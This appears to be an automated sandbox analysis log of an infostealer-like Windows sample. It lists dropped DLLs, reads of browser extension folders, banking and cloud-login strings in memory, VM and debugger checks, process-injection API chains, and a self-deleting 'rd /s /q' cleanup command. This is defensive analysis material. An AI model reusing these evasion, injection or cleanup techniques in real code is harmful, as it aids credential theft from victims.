Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Dropped PE file which has not been started: C:\Windows\Temp\1kuzcKGx Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Dropped PE file which has not been started: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\rfxvmt.dll Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Dropped PE file which has not been started: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\samctl.dll Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Dropped PE file which has not been started: C:\Windows\Temp\FHLBnhuN Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Dropped PE file which has not been started: C:\Windows\Temp\fJw4qvYl Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Dropped PE file which has not been started: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\cnccli.dll Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Dropped PE file which has not been started: C:\Windows\Temp\feJ0dymt Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Dropped PE file which has not been started: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\dwlmgr.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\ProgramData\softokn3.dll Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
Source: C:\Users\user\Desktop\file.exe API coverage: 6.4 %
Source: C:\ProgramData\BFCAAEHJDB.exe TID: 3616 Thread sleep count: 103 > 30 Jump to behavior
Source: C:\ProgramData\BFCAAEHJDB.exe TID: 3616 Thread sleep time: -6180000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe TID: 5140 Thread sleep count: 85 > 30 Jump to behavior
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe TID: 3756 Thread sleep count: 58 > 30
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe TID: 1112 Thread sleep count: 52 > 30
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe TID: 7132 Thread sleep count: 41 > 30
Source: C:\ProgramData\BFCAAEHJDB.exe Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070809 Jump to behavior
Source: C:\ProgramData\BFCAAEHJDB.exe Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04070809 Jump to behavior
Source: C:\ProgramData\BFCAAEHJDB.exe Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070809 Jump to behavior
Source: C:\ProgramData\BFCAAEHJDB.exe Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04070809 Jump to behavior
Source: C:\ProgramData\BFCAAEHJDB.exe Last function: Thread delayed
Source: C:\ProgramData\BFCAAEHJDB.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Last function: Thread delayed
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\file.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00401110 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,LoadLibraryW,CopyFileA,DeleteFileA,FindNextFileA,FindClose,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_00401110
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004099F0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, 0_2_004099F0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040A2C0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA, 0_2_0040A2C0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004156C0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose, 0_2_004156C0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040C2E0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_0040C2E0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00415EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_00415EA0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00414F80 wsprintfA,FindFirstFileA,memset,memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,memset,lstrcatA,strtok_s,strtok_s,memset,lstrcatA,strtok_s,PathMatchSpecA,DeleteFileA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,strtok_s,FindNextFileA,FindClose, 0_2_00414F80
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040B390 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_0040B390
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00409D40 StrCmpCA,FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_00409D40
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00415A70 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA, 0_2_00415A70
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040AAB0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose, 0_2_0040AAB0
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Code function: 23_2_00007FF6209447F3 FindNextFileA,_mbscpy,FindFirstFileA,GetLastError,GetLastError,FindClose, 23_2_00007FF6209447F3
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Code function: 23_2_00007FFDA389A0D3 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose, 23_2_00007FFDA389A0D3
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Code function: 23_2_00007FFDA38C1883 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose, 23_2_00007FFDA38C1883
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Code function: 23_2_00007FFDAC0A5BF3 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose, 23_2_00007FFDAC0A5BF3
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Code function: 23_2_00007FFDAC0D5803 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose, 23_2_00007FFDAC0D5803
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Code function: 23_2_00007FFDAC0F5253 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose, 23_2_00007FFDAC0F5253
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Code function: 23_2_00007FFDAC122FE3 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose, 23_2_00007FFDAC122FE3
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004153C0 GetLogicalDriveStringsA,memset,GetDriveTypeA,lstrcpyA,lstrcpyA,lstrcpyA,lstrlenA, 0_2_004153C0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040FDA0 GetSystemInfo,wsprintfA, 0_2_0040FDA0
Source: C:\ProgramData\BFCAAEHJDB.exe Thread delayed: delay time: 60000 Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\ Jump to behavior
Source: Amcache.hve.13.dr Binary or memory string: VMware
Source: file.exe, 00000000.00000003.2373662766.000000001B597000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: discord.comVMware20,11696487552f
Source: file.exe, 00000000.00000002.2762253914.000000000251A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2269115043.000000000251A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWq
Source: Amcache.hve.13.dr Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: file.exe, 00000000.00000003.2373662766.000000001B597000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
Source: file.exe, 00000000.00000002.2762253914.000000000251A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2269115043.000000000251A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2762253914.00000000024B8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: file.exe, 00000000.00000003.2373662766.000000001B597000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ms.portal.azure.comVMware20,11696487552
Source: file.exe, 00000000.00000003.2373662766.000000001B597000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
Source: file.exe, 00000000.00000003.2373662766.000000001B597000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: global block list test formVMware20,11696487552
Source: file.exe, 00000000.00000003.2373662766.000000001B597000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: tasks.office.comVMware20,11696487552o
Source: Amcache.hve.13.dr Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: main.exe, 00000017.00000002.3440076438.000001E397F57000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll!
Source: file.exe, 00000000.00000003.2373662766.000000001B597000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: AMC password management pageVMware20,11696487552
Source: file.exe, 00000000.00000003.2373662766.000000001B597000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: interactivebrokers.comVMware20,11696487552
Source: file.exe, 00000000.00000003.2373662766.000000001B597000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: dev.azure.comVMware20,11696487552j
Source: file.exe, 00000000.00000003.2373662766.000000001B597000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
Source: Amcache.hve.13.dr Binary or memory string: vmci.sys
Source: file.exe, 00000000.00000003.2373662766.000000001B597000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
Source: file.exe, 00000000.00000003.2373662766.000000001B597000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
Source: file.exe, 00000000.00000003.2373662766.000000001B597000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: outlook.office365.comVMware20,11696487552t
Source: Amcache.hve.13.dr Binary or memory string: VMware20,1
Source: Amcache.hve.13.dr Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.13.dr Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.13.dr Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: file.exe, 00000000.00000002.2762253914.00000000024B8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware
Source: file.exe, 00000000.00000002.2762253914.00000000024B8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMwareTZ
Source: Amcache.hve.13.dr Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.13.dr Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.13.dr Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.13.dr Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.13.dr Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.13.dr Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.13.dr Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: file.exe, 00000000.00000003.2373662766.000000001B597000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
Source: file.exe, 00000000.00000003.2373662766.000000001B597000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
Source: file.exe, 00000000.00000003.2373662766.000000001B597000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
Source: Amcache.hve.13.dr Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.13.dr Binary or memory string: vmci.syshbin
Source: Amcache.hve.13.dr Binary or memory string: VMware, Inc.
Source: file.exe, 00000000.00000003.2373662766.000000001B597000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: bankofamerica.comVMware20,11696487552x
Source: Amcache.hve.13.dr Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.13.dr Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.13.dr Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.13.dr Binary or memory string: VMware-42 27 80 4d 99 30 0e 9c-c1 9b 2a 23 ea 1f c4 20
Source: Amcache.hve.13.dr Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: file.exe, 00000000.00000003.2373662766.000000001B597000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
Source: Amcache.hve.13.dr Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.13.dr Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: file.exe, 00000000.00000003.2373662766.000000001B597000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
Source: BFCAAEHJDB.exe, 00000007.00000002.3447891511.0000000001198000.00000004.00000020.00020000.00000000.sdmp, euasv89vr56qz5toefmgc1.exe, 0000000E.00000002.2971561968.0000027B35867000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000017.00000003.2915570882.000001E397F6A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: file.exe, 00000000.00000003.2373662766.000000001B597000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
Source: file.exe, 00000000.00000002.2768054750.000000001B536000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: Amcache.hve.13.dr Binary or memory string: vmci.syshbin`
Source: Amcache.hve.13.dr Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.13.dr Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: file.exe, 00000000.00000003.2373662766.000000001B597000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
Source: file.exe, 00000000.00000003.2373662766.000000001B597000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
Source: file.exe, 00000000.00000003.2373662766.000000001B597000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
Source: file.exe, 00000000.00000003.2373662766.000000001B597000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
Source: file.exe, 00000000.00000003.2373662766.000000001B597000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
Source: Amcache.hve.13.dr Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: file.exe, 00000000.00000003.2373662766.000000001B597000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: outlook.office.comVMware20,11696487552s
Source: file.exe, 00000000.00000003.2373662766.000000001B597000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
Source: file.exe, 00000000.00000003.2373662766.000000001B597000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: turbotax.intuit.comVMware20,11696487552t
Source: file.exe, 00000000.00000003.2373662766.000000001B597000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
Source: file.exe, 00000000.00000003.2373662766.000000001B597000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
Source: file.exe, 00000000.00000003.2373662766.000000001B597000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Process queried: DebugPort
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0041D12F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_0041D12F
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00402000 VirtualProtect 00000000,00000004,00000100,? 0_2_00402000
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00417A40 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_00417A40
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004176E0 mov eax, dword ptr fs:[00000030h] 0_2_004176E0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00402000 lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,GetProcessHeap,HeapAlloc,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenA,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,VirtualProtect,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW, 0_2_00402000
Source: C:\ProgramData\BFCAAEHJDB.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0041ECC8 SetUnhandledExceptionFilter, 0_2_0041ECC8
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0041D12F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_0041D12F
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0041CAF5 memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_0041CAF5
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C81B66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_6C81B66C
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C81B1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_6C81B1F7
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C9CAC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_6C9CAC62
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Code function: 23_2_00007FF620941131 Sleep,Sleep,_amsg_exit,_initterm,_initterm,SetUnhandledExceptionFilter,_malloc_dbg,strlen,_malloc_dbg,_cexit, 23_2_00007FF620941131
Source: C:\Users\user\Desktop\file.exe Memory protected: page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Source: Yara match File source: Process Memory Space: file.exe PID: 5012, type: MEMORYSTR
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040ED80 memset,CreateProcessA,VirtualAlloc,GetThreadContext,ReadProcessMemory,VirtualAllocEx,ResumeThread,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread, 0_2_0040ED80
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00411400 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,FindCloseChangeNotification, 0_2_00411400
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004112F0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle, 0_2_004112F0
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Code function: 23_2_00007FFDA38CF0FE strlen,strcat,strlen,strlen,strlen,strcat,strlen,strlen,strlen,strcat,LogonUserA,GetLastError,CreateProcessAsUserA,GetLastError,CloseHandle,CreateProcessA,GetLastError, 23_2_00007FFDA38CF0FE
Source: C:\Users\user\Desktop\file.exe Process created: C:\ProgramData\BFCAAEHJDB.exe "C:\ProgramData\BFCAAEHJDB.exe" Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\DAEGIDHDHIDG" & exit Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10 Jump to behavior
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 5012 -ip 5012 Jump to behavior
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5012 -s 3212 Jump to behavior
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 436 -p 1524 -ip 1524 Jump to behavior
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 1524 -s 1176 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00401000 cpuid 0_2_00401000
Source: C:\Users\user\Desktop\file.exe Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree, 0_2_0040FC30
Source: C:\Users\user\Desktop\file.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\euasv89vr56qz5toefmgc1.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe Queries volume information: C:\ VolumeInformation
